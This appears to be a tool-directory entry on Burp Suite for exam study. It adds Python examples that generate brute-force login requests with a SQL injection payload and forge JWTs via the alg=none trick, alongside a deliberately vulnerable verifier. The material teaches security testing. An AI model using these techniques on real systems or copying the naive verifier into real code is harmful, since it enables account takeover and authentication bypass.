Burp Suite

PortSwigger

Leading web application security testing platform with intercepting proxy and scanner.

Tags: Vulnerability Management, Freemium, Platform / Suite, Learning, Cross-platform

Description

Burp Suite (PortSwigger) is the dominant web application security testing platform. The free Community edition gives you Proxy, Repeater, Decoder, Comparer and Sequencer, plus a heavily rate-limited Intruder; Professional adds the automated Scanner, Intruder at full speed, Collaborator and project files that can be saved to disk.

Core tools relevant to the exam:

  • Proxy — intercept, inspect and modify HTTP(S) and WebSocket traffic between browser and server. TLS traffic is only readable once Burp's CA certificate is installed in the browser's trust store.
  • Repeater — manually edit and resend a single request, diffing responses as you change one thing at a time.
  • Intruder — automated payload-based attacks (fuzzing, brute-force) against marked insertion points in a request; the attack types (sniper, cluster bomb, pitchfork) decide how payloads are combined across positions.
  • Scanner (Pro) — crawl plus passive and active scanning for common issues such as SQL injection and XSS. It will not find logic or access-control flaws, so it complements rather than replaces manual testing.
  • Collaborator (Pro) — out-of-band detection: a PortSwigger-hosted (or self-hosted) server records DNS and HTTP interactions triggered by blind payloads, which is how blind XXE, SSRF and blind command injection are confirmed.
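To make the Intruder attack types concrete, here is an added example (not PortSwigger code) that re-implements the payload-position model: the section sign delimits insertion points in a raw request, and sniper / cluster bomb / pitchfork decide how payloads are substituted. The request template, host name and payload lists are constructed for the demo. It also recomputes Content-Length after substitution, which Intruder does for you via its "update Content-Length header" option and which a hand-rolled replay script usually forgets.

```python
"""Added example: a minimal model of Burp Intruder's payload positions and
attack types. Not PortSwigger code; template and payloads are constructed."""
import itertools
import re
from typing import Iterable, Iterator
from urllib.parse import quote

MARK = "\u00a7"  # the section sign Intruder uses to delimit payload positions
POSITION_RE = re.compile(rf"{MARK}([^{MARK}]*){MARK}")

# Constructed request template with two payload positions (username, password).
TEMPLATE = (
    "POST /login HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    f"user={MARK}admin{MARK}&pass={MARK}password{MARK}"
)


def base_values(template: str) -> list[str]:
    """Return the original value inside each marked position, in order."""
    return POSITION_RE.findall(template)


def fix_content_length(request: str) -> str:
    """Recompute Content-Length for the (possibly resized) body."""
    head, sep, body = request.partition("\r\n\r\n")
    if not sep:
        return request
    length = len(body.encode("utf-8"))
    head, n = re.subn(r"(?mi)^Content-Length:[ \t]*\d+",
                      f"Content-Length: {length}", head)
    if n == 0 and body:
        head += f"\r\nContent-Length: {length}"
    return head + sep + body


def render(template: str, values: list[str]) -> str:
    """Substitute one value per position, left to right, markers removed."""
    it = iter(values)
    filled = POSITION_RE.sub(lambda _m: next(it), template)
    return fix_content_length(filled)


def sniper(template: str, payloads: Iterable[str]) -> Iterator[tuple[int, str, str]]:
    """Sniper: one payload set, one position at a time; the other positions
    keep their base value. Yields (position index, payload, request)."""
    payloads = list(payloads)
    base = base_values(template)
    for i in range(len(base)):
        for p in payloads:
            vals = list(base)
            vals[i] = p
            yield i, p, render(template, vals)


def cluster_bomb(template: str, payload_sets: list[list[str]]) -> Iterator[tuple[tuple[str, ...], str]]:
    """Cluster bomb: one set per position, every combination is tried
    (the usual choice for a user list x password list brute-force)."""
    if len(payload_sets) != len(base_values(template)):
        raise ValueError("need exactly one payload set per position")
    for combo in itertools.product(*payload_sets):
        yield combo, render(template, list(combo))


def pitchfork(template: str, payload_sets: list[list[str]]) -> Iterator[tuple[tuple[str, ...], str]]:
    """Pitchfork: one set per position, walked in parallel (n-th with n-th),
    e.g. known username/password pairs from a credential dump."""
    if len(payload_sets) != len(base_values(template)):
        raise ValueError("need exactly one payload set per position")
    for combo in zip(*payload_sets):
        yield combo, render(template, list(combo))


if __name__ == "__main__":
    users = ["admin", "alice"]
    # Intruder's payload-processing rules would URL-encode these; do it here.
    passwords = [quote(p, safe="") for p in ["password", "Winter2024!", "' OR '1'='1"]]
    for i, p, req in sniper(TEMPLATE, passwords):
        print(f"--- sniper position {i}, payload {p}\n{req}\n")
    print(sum(1 for _ in cluster_bomb(TEMPLATE, [users, passwords])), "cluster-bomb requests")
    print(sum(1 for _ in pitchfork(TEMPLATE, [users, passwords[:2]])), "pitchfork requests")
```

The request strings this yields are what Intruder would send; to actually deliver them you would open a socket (or route a requests session through Burp's listener on 127.0.0.1:8080 and let Intruder do the work). The counts matter in practice: cluster bomb grows multiplicatively, which is why it is the mode that trips account lockout and rate limiting first.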

Use cases

  • Manual web app pentesting
  • Validating fixes for OWASP Top 10 findings
  • API security testing against JSON/REST endpoints
  • Decoding and tampering with JWT and session tokens
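The JWT use case above is what you do by hand with Decoder and Repeater: base64url-decode the header and claims, change a claim, and see whether the server still accepts the token. The added example below (not PortSwigger code, standard library only) does exactly that, including the classic alg=none tamper, and puts a naive verifier that honours the header's alg next to a hardened one that pins HS256. The secret key and the claims are constructed for the demo.

```python
"""Added example: decode, tamper with and re-sign a JWT, then verify it two ways.
Not PortSwigger code; SECRET and the claims are constructed for the demo."""
import base64
import hashlib
import hmac
import json
from typing import Optional

SECRET = b"constructed-demo-key"  # assumption: the HS256 key the server holds


def b64url_decode(s: str) -> bytes:
    # JWT segments drop '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def encode_segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_jwt(token: str) -> tuple[dict, dict, str]:
    """Split a compact JWT into (header, claims, signature) WITHOUT verifying it.
    This is the Decoder view: useful for reading, never for trusting."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), s


def make_jwt(claims: dict, key: bytes, alg: str = "HS256") -> str:
    """Build a token; alg='none' yields an unsigned token with an empty signature."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = f"{encode_segment(header)}.{encode_segment(claims)}"
    if alg == "none":
        return signing_input + "."
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def tamper(token: str, **new_claims) -> str:
    """Rewrite claims and drop the signature via alg=none (the tester has no key)."""
    _header, claims, _sig = decode_jwt(token)
    claims.update(new_claims)
    return make_jwt(claims, key=b"", alg="none")


def verify_strict(token: str, key: bytes) -> Optional[dict]:
    """Hardened: pin the expected algorithm, constant-time compare the MAC."""
    try:
        header, claims, sig = decode_jwt(token)
        h, p, _ = token.split(".")
        provided = b64url_decode(sig)
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    return claims if hmac.compare_digest(provided, expected) else None


def verify_naive(token: str, key: bytes) -> Optional[dict]:
    """Vulnerable on purpose: trusts the alg the client put in the header,
    so an alg=none token is accepted with no signature at all."""
    try:
        header, claims, _sig = decode_jwt(token)
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") == "none":
        return claims
    return verify_strict(token, key)


if __name__ == "__main__":
    original = make_jwt({"sub": "alice", "role": "user"}, SECRET)
    forged = tamper(original, role="admin")
    print("decoded forged token:", decode_jwt(forged))
    print("naive verifier  :", verify_naive(forged, SECRET))
    print("strict verifier :", verify_strict(forged, SECRET))
```

When testing a real target, paste the forged token into the Authorization header in Repeater and compare the response with the original; a 200 with elevated data where the strict verifier would have returned nothing is the finding. The same decode/edit/re-encode flow applies to other signed-looking session tokens, except that without the key you can only observe whether the server checks the signature at all.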